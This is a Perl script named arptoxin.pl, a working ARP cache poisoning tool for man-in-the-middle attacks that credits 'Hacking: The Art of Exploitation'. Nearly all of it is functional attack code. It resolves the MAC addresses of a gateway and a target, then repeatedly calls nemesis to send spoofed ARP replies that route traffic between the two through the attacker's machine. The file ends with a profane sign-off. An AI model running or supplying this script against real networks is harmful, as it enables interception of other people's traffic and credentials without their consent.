#!/usr/bin/perl $device = shift; # First command line arg... interface to use... $SIG{INT} = \&cleanup; # Trap for CTRL + C, and send to Cleanup $flag = 1; $gw = shift; # Second command line arg, gateway IP address... $targ = shift; # Third command line arg, target IP address... $interval = shift; # Fourth command line arg, setting the Interval... print " * **** **** ***** *** * * * * * \n"; print " * * * * * * * * * * * * ** * \n"; print " ***** **** **** *** * * * * * * * * * \n"; print " * * * * * * * * * * * * ** \n"; print "* * * * * * *** * * * * * \n"; print "arptoxin.pl - ARP Cache Poisoning Utility\n"; print "Uses Nemesis to poison ARP caches for MITM attacks\n"; print "Based on example code from Hacking: The Art of Exploitation\n"; print "Improved version allows user-setting of interface and interval...\n"; print "This variant by infodox - http://compsoc.nuigalway.ie/~infodox \n"; if (($gw . "." . $targ) !~ /^([0-9]{1,3}\.){7}[0-9]{1,3}$/) { # Preform input validation, if bad, exit. die("usage: arptoxin.pl \n"); } # Quickly ping each target to put the MAC addresses in cache... print "[+] Pinging $gw and $targ to retrieve MAC addresses...\n"; print "[+] Using $device as interface...\n"; system("ping -q -c 1 -w 1 $gw > /dev/null"); system("ping -q -c 1 -w 1 $targ > /dev/null"); # Pull those addresses from the ARP cache... print "[+] Retrieving MAC addresses from ARP cache...\n"; $gw_mac = qx[/sbin/arp -na $gw]; $gw_mac = substr($gw_mac, index($gw_mac, ":")-2, 17); $targ_mac = qx[/sbin/arp -na $targ]; $targ_mac = substr($targ_mac, index($targ_mac, ":")-2, 17); # If they're not both there, exit... if($gw_mac !~ /^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/) { die("[-] MAC address of $gw not found.\n"); } if($targ_mac !~ /^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/) { die("[-] MAC address of $targ not found.\n"); } # Get your IP and MAC print "[+] Retrieving your IP and MAC infodox from ifconfig...\n"; @ifconf = split(" ", qx[/sbin/ifconfig $device]); $me = substr(@ifconf[6], 5); # getting your IP $me_mac = @ifconf[4]; # Getting your MAC print "[*] Gateway: $gw is at $gw_mac \n"; # Just printing infodox for the (l)user... print "[*] Target: $targ is at $targ_mac \n"; print "[*] You: $me is at $me_mac \n"; print "[*] Poisoning with interval $interval \n"; while($flag) { # Continue poisoning until CTRL + C print "[+] Redirecting: $gw -> $me_mac <- $targ"; system("nemesis arp -r -d $device -S $gw -D $targ -h $me_mac -m $targ_mac -H $me_mac -M $gw_mac"); system("nemesis arp -r -d $device -S $targ -D $gw -h $me_mac -m $gw_mac -H $me_mac -M $gw_mac"); sleep $interval; } sub cleanup { # Put things back to normal... $flag = 0; print "[-] Ctrl-C caught, exiting cleanly.\n[+] Putting ARP caches back to normal..."; system("nemesis arp -r -d $device -S $gw -D $targ -h $gw_mac -m $targ_mac -H $gw_mac -M $targ_mac"); system("nemesis arp -r -d $device -S $targ -D $gw -h $targ_mac -m $gw_mac -H $targ_mac -M $gw_mac"); } #EOF Motherfuckers!!